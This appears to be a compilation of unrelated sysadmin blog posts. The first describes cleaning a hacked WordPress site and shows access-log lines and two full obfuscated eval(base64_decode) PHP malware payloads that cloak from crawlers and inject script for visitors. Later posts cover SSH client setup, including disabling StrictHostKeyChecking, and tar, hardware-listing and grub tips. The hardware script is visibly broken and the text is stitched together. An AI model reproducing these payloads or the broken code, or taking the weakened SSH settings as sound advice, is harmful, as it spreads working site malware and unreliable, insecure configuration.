They were hitting to same file (index.php) over and over, although I had cleaned up all the other codes they had added, whatever they were sending to index.php was adding everything back to the websites. This attack would fly uncaught since they are adding iframe into the code which wouldn’t bother you or visitors if it is not interpreted right by your browser (blocked by addons etc.) but if you leave the hole open, they can query database – extract information, open other holes for themselves and pretty much anything a mutant would do.

Here is the solution.
If you are facing the same situation, you need to find POST logs in access.log. This command:

#grep POST access.log

would allow you to see where they are perpetrating and you need to remove those files.

http/access.log:50.73.176.163 - - [29/Nov/2011:00:37:42 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 257
http/access.log:212.122.48.43 - - [29/Nov/2011:01:37:50 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:69.64.46.85 - - [29/Nov/2011:02:37:43 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:79.98.242.246 - - [29/Nov/2011:03:10:09 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:64.90.52.173 - - [29/Nov/2011:03:40:33 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 178
http/access.log:122.248.194.9 - - [29/Nov/2011:04:40:48 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 342
http/access.log:50.57.155.37 - - [29/Nov/2011:06:40:59 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215
http/access.log:189.17.169.186 - - [29/Nov/2011:07:41:50 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:195.218.148.226 - - [29/Nov/2011:08:33:45 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 159
http/access.log:84.235.45.241 - - [29/Nov/2011:08:40:15 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:174.142.19.205 - - [29/Nov/2011:09:39:52 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 220
http/access.log:119.75.23.81 - - [29/Nov/2011:10:39:53 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 257
http/access.log:85.13.72.233 - - [29/Nov/2011:11:39:38 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.0" 200 215
http/access.log:146.23.176.12 - - [29/Nov/2011:12:39:52 -0800] "POST /wp-content/themes/twentyeleven/index.php HTTP/1.1" 200 215

eval(base64_decode
('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlk
ZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2
h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIu
Y29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycn
JyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdz
em4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2
lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42
OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOT
EuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIp
LA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKS
wNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0K
CWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA
0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXko
IjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS
4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4y
NTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQ
oJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydS
RU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJE
lQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlf
aXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2
lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFr
O30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdG
xQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5
YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1
pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9L
WHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWE
dJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktE
TWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVz
hnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJv
cksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNX
RQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUy
WDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54am
IyOXJhV1Y0ZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lO
VFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1
RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6Tmpjd056Z3pZakl3TnpRMlpq
Y3dNMkV5TURKa016SXpPVE01TXpjM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNek16TURJeU1qQTJPRF
kxTmprMk56WTROelF6WkRJeU16UXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyTVRjMU56TTNNamM0TnpZMk9UWXhNekUyTlRj
d05tUTJOREpsTmpNMk5USmxObVEzTXpKbU5qa3laVGN3TmpnM01ETm1OamMyWmpOa016RXlNak5sTTJNeVpqWTVOalkzTWpZeE5tUTJOVE5sTTJNeVpqWT
BOamszTmpObEp5NXpjR3hwZENnbmZDY3BMREFzZTMwcEtUd3ZjMk55YVhCMFBnPT0iKTsNCn0='));

eval(base64_decode
('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlk
ZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2
h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIu
Y29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycn
JyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdz
em4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2
lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42
OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOT
EuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIp
LA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKS
wNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0K
CWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA
0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXko
IjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS
4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4y
NTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQ
oJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydS
RU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJE
lQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlf
aXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2
lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFr
O30NCn0NCmlmICghJGJvdCkgew0KZWNobyBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RENWxkbUZzS0daMWJtTjBhVzl1S0hBc1lTeGpMR3NzWlN4a0tYdG
xQV1oxYm1OMGFXOXVLR01wZTNKbGRIVnliaWhqUEdFL0p5YzZaU2h3WVhKelpVbHVkQ2hqTDJFcEtTa3JLQ2hqUFdNbFlTaytNelUvVTNSeWFXNW5MbVp5
YjIxRGFHRnlRMjlrWlNoakt6STVLVHBqTG5SdlUzUnlhVzVuS0RNMktTbDlPMmxtS0NFbkp5NXlaWEJzWVdObEtDOWVMeXhUZEhKcGJtY3BLWHQzYUdsc1
pTaGpMUzBwZTJSYlpTaGpLVjA5YTF0alhYeDhaU2hqS1gxclBWdG1kVzVqZEdsdmJpaGxLWHR5WlhSMWNtNGdaRnRsWFgxZE8yVTlablZ1WTNScGIyNG9L
WHR5WlhSMWNtNG5YRngzS3lkOU8yTTlNWDA3ZDJocGJHVW9ZeTB0S1h0cFppaHJXMk5kS1h0d1BYQXVjbVZ3YkdGalpTaHVaWGNnVW1WblJYaHdLQ2RjWE
dJbksyVW9ZeWtySjF4Y1lpY3NKMmNuS1N4clcyTmRLWDE5Y21WMGRYSnVJSEI5S0NkeUlHNG9OU2w3TXlCaVBWd25kMXduT3pNZ1l6MW9JR1VvS1R0cktE
TWdhVDB3TzJrOGVEdHBLeXNwZTJOYllpNW1LR2srUGpRcEsySXVaaWhwSm5VcFhUMTBMbkVvYVNsOU5pZ2hOUzV6S0M5ZVcyRXRkaTA1WFNva0wya3BLVz
hnZVRzMktEVXVaeVV5S1RVOVhDY3dYQ2NyTlRzeklHdzlOUzVuT3pNZ056MW9JR1VvS1RzeklHbzlNRHRyS0RNZ2FUMHdPMms4YkR0cEt6MHlLWHMzVzJv
cksxMDlZMXMxTGtFb2FTd3lLVjE5YnlBM0xub29YQ2RjSnlsOU5pZzRMbTB1UXloY0ozQTlaRnduS1QwOUxURXBlemd1UWlodUtGd25SRnduS1NrN09DNX
RQVnduY0Qxa1hDZDlKeXcwTUN3ME1Dd25mSHg4ZG1GeWZIeGtZWFJoZkdsbWZISmxjM1ZzZEh4a2IyTjFiV1Z1ZEh4OGZHSXhObDlrYVdkcGRITjhZakUy
WDIxaGNIeGxibUZpYkdWa2ZFRnljbUY1ZkdOb1lYSkJkSHhzWlc1bmRHaDhibVYzZkh4OFptOXlmR3hzZkdOdmIydHBaWHhvUkdOa2ZISmxkSFZ5Ym54am
IyOXJhV1Y0ZkdaeWIyMURhR0Z5UTI5a1pYeG1kVzVqZEdsdmJueHRZWFJqYUh4VGRISnBibWQ4TVRWOFpqQjhNREV5TXpRMU5qYzRPV0ZpWTJSbFpud3lO
VFo4Wm1Gc2MyVjhhbTlwYm54emRXSnpkSEo4ZDNKcGRHVjhhVzVrWlhoUFpud3pZelkwTmprM05qSXdOek0zTkRjNU5tTTJOVE5rTWpJM01EWm1Oek0yT1
RjME5qazJaalpsTTJFeU1EWXhOakkzTXpabU5tTTNOVGMwTmpVellqSXdObU0yTlRZMk56UXpZVEl3TW1Rek1UTTVNemt6TVRjd056Z3pZakl3TnpRMlpq
Y3dNMkV5TURKa016SXpPVE01TXpNM01EYzRNMkl5TWpObE0yTTJPVFkyTnpJMk1UWmtOalV5TURjM05qazJORGMwTmpnelpESXlNelF6TURJeU1qQTJPRF
kxTmprMk56WTROelF6WkRJeU16TXpNREl5TWpBM016Y3lOak16WkRJeU5qZzNORGMwTnpBellUSm1NbVkyWmpaaU16VXpOalkzTnpBMlpUYzFNemt6T1Ra
bU1tVTJNelkxTW1VMlpEY3pNbVkyT1RKbE56QTJPRGN3TTJZMk56Wm1NMlF6TVRJeU0yVXpZekptTmprMk5qY3lOakUyWkRZMU0yVXpZekptTmpRMk9UYz
JNMlVuTG5Od2JHbDBLQ2Q4Snlrc01DeDdmU2twUEM5elkzSnBjSFErIik7DQp9'));'));

Could not create directory ‘/home/xxx/.ssh’.
The authenticity of host can’t be established.
Failed to add the host to the list of known hosts (/home/xxx/.ssh/known_hosts)

It is very annoying to type in Yes everytime trying to connect to a server so I decided to do some research but couldn’t find solution.

I found my solution this way:

-Create  a file in your hard drive (wherever you feel like), I have created mine under: c:\users\myusername\known_hosts (ex: c:\users\john\known_hosts)
-find ssh_config under OpenSSH\etc\ folder and add this line

UserKnownHostsFile c:/users/john/known_hosts

 After you add this line, try to connect and you won’t have to type in “Yes” anymore. If you would like to disable known_hosts file check completely, you can also change this line:
StrictHostKeyChecking yes

to

StrictHostKeyChecking no

 That will allow you avoid known_hosts from get go.

If you want to do public key authentication but you are not able to use ssh-keygen to create because you are getting:

Generating public/private rsa key pair.
Enter file in which to save the key (/home/xxx/.ssh/id_rsa):
Could not create directory ‘/home/xxx/.ssh’.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
open /home/xxx/.ssh/id_rsa failed: No such file or directory.
Saving the key failed: /home/xxx/.ssh/id_rsa.

You can run ssh-keygen uder c:\program files\openssh\bin\ folder  with this:

ssh-keygen -t rsa -f id_rsa

-f switch would allow you to add a filename. Once you create the public and private key (for this example: id_rsa and id_rsa.pub) go back to your c:\program files\openssh\etc\ssh_config file and remove # from
#IdentityFile ~/.ssh/id_rsa

and point it to your new file:

IdentityFile c:/program files/openssh/bin/id_rsa

I believe it was due to Mediatemple’s environment which strictly jails you under your account. I tried to exclude with full path initially but it kept getting all the files.

So I decided to use -v (verbose) argument to show the compressed files in the realtime. This way you can capture instantly if you are making a mistake or not. I was initially doing with:

tar -cvf techsoar.tgz --exclude "/full-path/phones/*" --exclude "/full-path/mobiles/*" ./

Which I realized using with “” was a mistake and furthermore not putting an “=” sign between –exclude=… was also wrong.

So finally I could get it working with this line:

tar -cvf techsoar.tgz --exclude=phones/* --exclude=mobiles/* ./

In this article we will mention about different methods to get the hardware details from your Linux OS. These tips are mainly for Redhat, Suse and Debian and different distros might include little or more details for the hardware depending on the kernel levels.

1- Hardware Details on Linux using custom script:

This script will get almost everything you would need using existing messages or applications and give you a brief output.

It uses dmesg to get Memory Information
lspci for displaying information about all PCI buses in the system and all devices connected to them. By default, it shows a brief list of devices.
/proc/cpuinfo for CPU information (including cpu model, modelname (AMD Opteron(tm) Processor), Mhz (1992 Mhz)
fdisk -l –> For Hard drive and partition information
rpm -qa for the release info (mainly for Redhat) so you can remove this line for other distros.
/etc/*-release to get the Linux distro
uname -a to get the Linux Kernel level

#!/usr/bin/sh
rm  /tmp/outputecho "/n PCI info /n" >  /tmp/output
lspci >> /tmp/output
echo "/n Memory info /n" >>  /tmp/output /tmp/output
dmesg | grep -i memory >>  /tmp/output
echo "/n CPU info /n" >> /tmp/output
cat /proc/cpuinfo  /n" >>  /tmp/output
echo " HDD info /n" >>  /tmp/output
fdisk -l >>  /tmp/output
echo "/n " >>  /tmp/output
fdisk -l /dev/sdb* >> /tmp/output
echo "/n" >>  /tmp/output
fdisk -l /dev/hda* >> /tmp/output
echo "/n  Package info /n" >>  /tmp/output
rpm -qa >> /tmp/output
echo "/n Relese info /n" >> /tmp/output
cat /etc/*-release >> /tmp/output
echo "/n platform info /n" >> /tmp/output
uname -a >> /tmp/output

2- Hardware Details on Linux using tools (hwinfo, lshw):

There are different tools for different distros that you can use to get the hardware details.

On Suse, you can use: # hwinfo

You could hwinfo for Debians (apt-get hwinfo) very quickly too. It is very handy.
# hwinfo –short will give you a brief summary of your hardware

# hwinfo --short
cpu:
AMD Opteron(tm) Processor 246, 1992 MHz
AMD Opteron(tm) Processor 246, 1992 MHz
monitor:
Generic Monitor
graphics card:
ATI Rage XL
storage:
Floppy disk controller
AMD-8111 IDE
Silicon Image SiI 3114 SATALink Controller
network:
eth2                 Intel EtherExpress PRO/100 S Server Adapter
eth0                 Broadcom NetXtreme BCM5704 Gigabit Ethernet
eth1                 Broadcom NetXtreme BCM5704 Gigabit Ethernet
network interface:
lo                   Loopback network interface
eth0                 Ethernet network interface
eth1                 Ethernet network interface
eth2                 Ethernet network interface

On Debian, you can use: # lshw

# lshw -short will generate a summary output of your hardware list in a organized fashion.

H/W path            Device      Class      Description
======================================================
system     PowerEdge 1950
/0                              bus        0TT740
/0/0                            memory     64KiB BIOS
/0/400                          processor  Intel(R) Xeon(R) CPU           E5405  @ 2.00GHz
/0/400/700                      memory     128KiB L1 cache
/0/400/701                      memory     12MiB L2 cache
/0/400/702                      memory     L3 cache
/0/401                          processor  Intel(R) Xeon(R) CPU           E5405  @ 2.00GHz
/0/401/703                      memory     128KiB L1 cache
/0/401/704                      memory     12MiB L2 cache
/0/401/705                      memory     L3 cache
/0/1000                         memory     8GiB System Memory

3- Hardware Details on Linux using /proc folder:
You can get as many details as you like by just going under /proc folder and showing the contents of files. (# more meminfo)

# more meminfo
MemTotal:      8186420 kB
MemFree:         56572 kB
Buffers:        166008 kB
Cached:        4887080 kB
SwapCached:         12 kB
Active:        2886576 kB
Inactive:      4722968 kB
SwapTotal:     7807580 kB
SwapFree:      7807548 kB
Dirty:             220 kB
Writeback:           0 kB
AnonPages:     2556436 kB
Mapped:          35064 kB
Slab:           453328 kB
SReclaimable:   422408 kB
SUnreclaim:      30920 kB
PageTables:      11848 kB
NFS_Unstable:        0 kB
Bounce:              0 kB
CommitLimit:  11900788 kB
Committed_AS:  4229312 kB
VmallocTotal: 34359738367 kB
VmallocUsed:     27880 kB
VmallocChunk: 34359710403 kB
HugePages_Total:     0
HugePages_Free:      0
HugePages_Rsvd:      0
HugePages_Surp:      0
Hugepagesize:     2048 kB

4- Listing DMI Table with dmidecode and USB devices with lsusb:

Another very effective and powerful tool is # dmidecode. dmidecode is a tool for dumping a computers DMI (some say SMBIOS) table contents in a human-readable format. This table contains a description of the systems hardware components, as well as other useful pieces of information such as serial numbers and BIOS revision.

# lsusb is the tool to show the devices attached to USB port even more.

if you use only # lsusb it will list the ports and what’s attached to it. If you use, lsusb with -v (verbose) you will get tons of info about USB ports.

# lsusb -v
Bus 002 Device 001: ID 0000:0000
Device Descriptor:
bLength                18
bDescriptorType         1
bcdUSB               1.10
bDeviceClass            9 Hub
bDeviceSubClass         0 Unused
bDeviceProtocol         0 Full speed hub
bMaxPacketSize0        64
idVendor           0x0000
idProduct          0x0000
bcdDevice            2.06
iManufacturer           3 Linux 2.6.18.2-34-default ohci_hcd
iProduct                2 OHCI Host Controller
iSerial                 1 0000:03:00.1
bNumConfigurations      1
Configuration Descriptor:
bLength                 9
bDescriptorType         2
wTotalLength           25
bNumInterfaces          1
bConfigurationValue     1
iConfiguration          0
bmAttributes         0xe0
Self Powered
Remote Wakeup
MaxPower                0mA
Interface Descriptor:
bLength                 9
bDescriptorType         4
bInterfaceNumber        0
bAlternateSetting       0
bNumEndpoints           1
bInterfaceClass         9 Hub
bInterfaceSubClass      0 Unused
bInterfaceProtocol      0 Full speed hub
iInterface              0
Endpoint Descriptor:
bLength                 7
bDescriptorType         5
bEndpointAddress     0x81  EP 1 IN
bmAttributes            3
Transfer Type            Interrupt
Synch Type               None
Usage Type               Data
wMaxPacketSize     0x0002  1x 2 bytes
bInterval             255

- You need to edit /boot/grub/menu.lst
- To the end there are lines:
title Ubuntu 8.04.2, kernel 2.6.24-23 server
….
….
kernel /vmlinuz-2.6.24-23…

at the end of kernel /vmlinuz line we need to a new argument ‘vga’.

I mostly use vga=791

then update grub using:

# update-grub

and reboot.